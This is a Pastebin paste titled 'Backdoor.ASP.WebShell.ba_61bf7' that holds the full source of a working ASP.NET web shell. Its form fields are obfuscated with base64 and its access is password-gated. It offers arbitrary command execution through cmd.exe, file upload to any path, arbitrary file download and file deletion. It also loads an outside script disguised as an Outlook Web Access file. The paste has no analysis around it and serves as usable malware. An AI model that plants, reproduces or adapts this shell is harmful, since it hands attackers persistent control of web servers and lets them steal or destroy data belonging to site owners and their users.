FlyFar

Backdoor.ASP.WebShell.ba_61bf7 - Source Code

Jun 9th, 2023
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASP 10.01 KB | Cybersecurity | 0 0
  1. <%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
  2.  
  3. <html xmlns="http://www.w3.org/1999/xhtml">
  4. <head>
  5. <%
  6. c();
  7. NameValueCollection t=HttpContext.Current.Request.Form;
  8. passwords=fbss(t[x("cGFzc3dvcmRz")]);pro=fbss(t[x("cHJv")]);cmd_exceut=fbss(t[x("Y21kX2V4Y2V1dA==")]);sav=fbss(t[x("c2F2")]);vir=t[x("dmly")];nenggg=fbss(t[x("bmVuZ2dn")]);upb=fbss(t[x("dXBi")]);upd=fbss(t["upd"]);del=fbss(t[x("dXBk")]);dongnn=fbss(t[x("ZG9uZ25u")]);baseFileName=t[x("YmFzZUZpbGVOYW1l")];baseAddress=fbss(t[x("YmFzZUFkZHJlc3M=")]);baseVirpath=t[x("YmFzZVZpcnBhdGg=")];
  9. if(!string.IsNullOrEmpty(passwords))c(passwords);
  10. else if(!string.IsNullOrEmpty(cmd_exceut))r(pro,cmd_exceut);
  11. else if(HttpContext.Current.Request.Files[x("dXBsb2FkbA==")]!=null)u(HttpContext.Current.Request.Files[x("dXBsb2FkbA==")],sav,string.IsNullOrEmpty(vir)?false:true,nenggg);
  12. else if(!string.IsNullOrEmpty(upb))h(upb,upd);
  13. else if(!string.IsNullOrEmpty(del))d(del);
  14. else if(!string.IsNullOrEmpty(dongnn))z(dongnn);
  15. else if(!string.IsNullOrEmpty(baseFileName))baseuploadl(baseFileName,baseAddress,string.IsNullOrEmpty(baseVirpath)?false:true);
  16.  
  17. if(HttpContext.Current.Request.Cookies["data"]!=null){string data=HttpContext.Current.Request.Cookies["data"].Value;string[] data2=data.Split(new string[]{"&|&"},StringSplitOptions.None);for(int i=0;i<data2.Length;i++){string[] data3=data2[i].Split(new string[]{"$=$"},StringSplitOptions.None);
  18. switch (data3[0]){
  19. case"pro":pro=a(pro,fbss(data3[1]));break;
  20. case"cmd_exceut":cmd_exceut=a(cmd_exceut,fbss(data3[1]));break;
  21. case"sav":sav=a(sav,fbss(data3[1]));break;
  22. case"vir":vir=a(vir,fbss(data3[1]));break;
  23. case"nenggg":nenggg=a(nenggg,fbss(data3[1]));break;
  24. case"dongnn":dongnn=a(dongnn,fbss(data3[1]));break;
  25. }}}
  26.  
  27. view();
  28.     %>
  29. <script runat="server">
  30. string passwords,pro,cmd_exceut,sav,vir,nenggg,upb,upd,del,dongnn,baseFileName,baseAddress,baseVirpath;
  31. bool aut = false;
  32. string pp = "FX7nUf6oTBuYLHjBvsBRvoRNM7o=";
  33. string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
  34. string tb(string a)
  35. {
  36.     string ret="";
  37.     try{
  38.         ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));
  39.         }catch{
  40.            
  41.         }
  42.         return ret;
  43. }
  44. string fbss(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
  45. void view(){string data = string.Format(x("cHJvJD0kezB9JnwmY21kX2V4Y2V1dCQ9JHsxfSZ8JnNhdiQ9JHsyfSZ8JnZpciQ9JHszfSZ8Jm5lbmdnZyQ9JHs0fSZ8JmRvbmdubiQ9JHs1fQ=="),
  46. tb(pro),tb(cmd_exceut),tb(sav),tb(vir),tb(nenggg),tb(dongnn));
  47. HttpCookie coo=new HttpCookie("data", data);coo.Expires=DateTime.Now.AddDays(1);HttpContext.Current.Response.SetCookie(coo);}
  48.  
  49. void c(string passwords)
  50. {
  51.     try{HttpCookie coo=new HttpCookie(x("cGFzc3dvcmRz"),tb(passwords));
  52.     coo.Expires=DateTime.Now.AddDays(1);
  53.     HttpContext.Current.Response.SetCookie(coo);
  54.     aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(passwords)))==pp;
  55.     }catch(Exception e)
  56.     {
  57.         l(e.Message);}
  58.     }
  59. bool c(){try{if(HttpContext.Current.Request.Cookies[x("cGFzc3dvcmRz")]!=null){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(fbss(HttpContext.Current.Request.Cookies[x("cGFzc3dvcmRz")].Value))))==pp;return aut;}}catch(Exception e){l(e.Message);}return false;}
  60. void u(HttpPostedFile uploadl, string sav, bool vir, string nenggg){try{if(c()){if(uploadl!=null&&uploadl.ContentLength>0){string fn=string.IsNullOrEmpty(nenggg)?System.IO.Path.GetFileName(uploadl.FileName):nenggg;string path=vir?Server.MapPath(sav):sav;string SaveLocation=System.IO.Path.HasExtension(path)?path:path.TrimEnd('\\')+"\\"+fn;uploadl.SaveAs(SaveLocation);l("File uploadloaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
  61. void baseuploadl(string baseFileName,string baseAddress, bool baseVirpath){try{if(c()){if(baseFileName!=null&&baseFileName.Length>0&&!string.IsNullOrEmpty(baseAddress)){string SaveLocation=baseVirpath?Server.MapPath(baseAddress):baseAddress;System.IO.File.WriteAllBytes(SaveLocation,Convert.FromBase64String(baseFileName));l("File uploadloaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
  62. void r(string pro, string cmd_exceut){try{if(c()){System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd_exceut);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();l(HttpUtility.HtmlEncode(o));}}catch(Exception ex){l(ex.Message);}}
  63. void z(string dongnn){try{if(c()&&!string.IsNullOrEmpty(dongnn)){byte[] f=System.IO.File.ReadAllBytes(dongnn);System.Web.HttpContext t=System.Web.HttpContext.Current;t.Response.Clear();t.Response.ClearHeaders();t.Response.ClearContent();t.Response.AppendHeader("content-length",f.Length.ToString());t.Response.ContentType="application/octet-stream";t.Response.AppendHeader("content-disposition","attachment; filename="+dongnn.Substring(dongnn.LastIndexOf('\\')+1));t.Response.BinaryWrite(f);t.Response.End();}}catch(Exception ex){l(ex.Message);}}
  64. void h(string upb, string upd){try{if(c()&&!string.IsNullOrEmpty(upb)&&!string.IsNullOrEmpty(upd)){System.IO.File.WriteAllBytes(System.IO.Path.GetTempPath()+upd,Convert.FromBase64String(upb));l(upd+" successfuly uploadloaded");}}catch(Exception ex){l(ex.Message);}}
  65. void d(string del){try{if(c()&&!string.IsNullOrEmpty(del)){System.IO.File.Delete(System.IO.Path.GetTempPath()+del);l(del+" successfuly deleled");}}catch(Exception ex){l(ex.Message);}}
  66. string x(string f){return Encoding.UTF8.GetString(Convert.FromBase64String(f));}
  67. void l(string ll){log.InnerHtml=tb(ll);}
  68. </script>
  69. <style>body,html{margin:0;padding:3px 0 0 3px;direction:ltr;background:#000;color:#fff !important;}form{margin:0;}*{font:14px "Lucida Console";}t{width:180px;display:inline-block;text-align:right;padding-right:5px;}input[type="text"],input[type="file"],textarea {width:50%;height:25px;background:#444;color:#fff;border:1px solid #999;margin-bottom:3px;}input[type="text"]{padding:2px;}input[type="button"],input[type="submit"] {height:23px;}input[type="checkbox"]{width:23px;height:24px;position:absolute;margin:0;}hr{margin:0;border:0;border-top:1px solid #DDD;}.h{width:100px;text-align:center;background:rgba(19, 96, 0, 1);vertical-align:middle;}table{width:100%;margin:0;border-collapse:collapse;}.b{padding:10px 0px 9px;}</style>
  70. <script>
  71. function use() { var n = document; var d = n.getElementById("d").innerHTML; d = d.substring(0, d.lastIndexOf('\\') + 1); n.getElementsByName("cmd_exceut")[0].value += d; n.getElementsByName("sav")[0].value += d; n.getElementsByName("dongnn")[0].value += d; }
  72. function subm(){var mmm=document.getElementsByClassName('mmm');for(var i=0;i<mmm.length;i++){mmm[i].value=btoa(mmm[i].value);}}
  73. function reset() { document.cookie = "data=;expires=Thu, 01 Jan 1971 00:00:01 GMT;path=/";location.href = location.pathname;}
  74. </script>
  75. <script src='https://mail.namagesy.de/owa/prem/15.1.1847/scripts/microsoft.owa.core.immanager.js' ></script>
  76. </head>
  77. <body>
  78. <table>
  79. <tr>
  80. <td class="h"><%=x("QWRkcmVzcw==")%></td>
  81. <td class="b">
  82. <t><%=x("Q3VycmVudA==")%> :</t>
  83. <y id="d"><%= Server.MapPath(string.Empty) + "\\"%></y>
  84. <input type="button" value="<%=x("VXNl")%>" onclick="use()" />
  85. <input type="button" value="<%=x("UmVzZXQgRm9ybQ==")%>" onclick="reset()" />
  86. </td>
  87. </tr>
  88. </table>
  89. <hr>
  90. <form method="post">
  91. <table>
  92. <tr>
  93. <td class="h"><%=x("TG9naW4=")%></td>
  94. <td class="b">
  95. <t><%=x("RG8gaXQ=")%> :</t>
  96. <input name="passwords" class="mmm" type="text" style='background-color: <%= aut ? "Green" : "Red" %>' />
  97. <input type="submit" value="<%= x("RG8gaXQ=") %>" onclick="subm();" />
  98. </td>
  99. </tr>
  100. </table>
  101. </form>
  102. <hr>
  103. <form method="post">
  104. <table>
  105. <tr>
  106. <td class="h"><%=x("Q29tbWFuZA==")%></td>
  107. <td class="b">
  108. <t><%=x("UHJvY2Vzcw==")%> :</t>
  109. <input name="pro" class="mmm" type="text" value='<%= string.IsNullOrEmpty(pro) ? x("Y21kLmV4ZQ==") : pro %>' /><br>
  110. <t><%=x("Q29tbWFuZA==")%> :</t>
  111. <input name="cmd_exceut" class="mmm" type="text" value='<%= cmd_exceut %>' />
  112. <input type="submit" value="<%= x("RXhlY3V0ZQ==") %>" onclick="subm();" />
  113. </td>
  114. </tr>
  115. </table>
  116. </form>
  117. <hr>
  118. <form method="post" enctype="multipart/form-data">
  119. <table>
  120. <tr>
  121. <td class="h"><%=x("VXBsb2Fk")%></td>
  122. <td class="b">
  123. <t><%=x("RmlsZSBOYW1l")%> :</t>
  124. <input name="uploadl" type="file" /><br>
  125. <t><%=x("U2F2ZSBhcw==")%> :</t>
  126. <input name="sav" class="mmm" type="text" value='<%= sav %>' />
  127. <input name="vir" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
  128. <t><%=x("TmV3IEZpbGUgbmFtZQ==")%> :</t>
  129. <input name="nenggg" class="mmm" type="text" value='<%= nenggg %>' />
  130. <input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
  131. </td>
  132. </tr>
  133. </table>
  134. </form>
  135. <hr>
  136. <form method="post">
  137. <table>
  138. <tr>
  139. <td class="h"><%=x("RG93bmxvYWQ=")%></td>
  140. <td class="b">
  141. <t><%=x("RG93bmxvYWQgUGF0aA==")%> :</t>
  142. <input name="dongnn" type="text" />
  143. <input type="submit" value="<%= x("RG93bmxvYWQ=") %>" onclick="document.getElementsByName('dongnn')[0].value = btoa(document.getElementsByName('dongnn')[0].value);" />
  144. </td>
  145. </tr>
  146. </table>
  147. </form>
  148. <hr />
  149. <form method="post">
  150. <table>
  151. <tr>
  152. <td class="h"><%=x("VXBsb2FkIEJhc2U2NA==")%></td>
  153. <td class="b">
  154. <t><%=x("QmFzZTY0IEZpbGU=")%> :</t>
  155. <textarea name="baseFileName"></textarea>
  156. <input name="baseVirpath" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
  157. <t><%=x("RmlsZSBQYXRoIGFuZCBOYW1l ")%> :</t>
  158. <input name="baseAddress" class="mmm" type="text" value='<%= baseAddress %>' />
  159. <input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
  160. </td>
  161. </tr>
  162. </table>
  163. </form>
  164. <hr />
  165. </form>
  166. <hr />
  167. <br />
  168. <pre id="log" runat="server"></pre>
  169. <script>var ll=document.getElementById('log');if(ll.innerHTML)ll.innerHTML=atob(log.innerHTML);</script>
  170. </body>
  171. </html>
  172. XXxxxx
Add Comment
Please, Sign In to add comment